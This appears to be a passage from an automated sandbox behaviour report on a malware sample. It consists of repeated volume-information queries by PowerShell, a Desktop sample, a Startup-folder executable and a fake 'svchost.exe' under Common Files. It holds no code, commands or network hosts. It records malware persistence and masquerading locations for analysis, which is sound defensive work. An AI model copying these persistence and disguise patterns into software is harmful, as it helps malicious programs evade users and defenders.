                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeQueries volume information: C:\Users\user\Desktop\lKJbVguaav.exe VolumeInformation
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeQueries volume information: C:\Program Files\Common Files\system\E59A6148\svchost.exe VolumeInformation
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeQueries volume information: C:\Program Files\Common Files\system\E59A6148\svchost.exe VolumeInformation
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
